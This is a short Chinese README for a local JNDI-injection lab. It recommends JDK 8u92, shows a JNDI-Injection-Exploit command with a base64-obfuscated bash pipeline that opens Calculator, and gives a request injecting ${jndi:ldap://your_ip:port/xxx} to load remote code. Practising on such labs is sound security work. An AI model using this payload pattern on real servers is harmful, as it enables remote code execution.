项目启动之后访问: http://127.0.0.1:9090/vul
JDK 版本:java8u92 (避免使用过高的版本,建议同我一致,高版本对JNDI注入有一定限制)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,b3BlbiAtYSBDYWxjdWxhdG9y}|{base64,-d}|{bash,-i}" -A 127.0.0.1
使用以上工具生成PAYLOAD。
访问 http://127.0.0.1:9090/vul?action=${jndi:ldap://your_ip:port/xxx}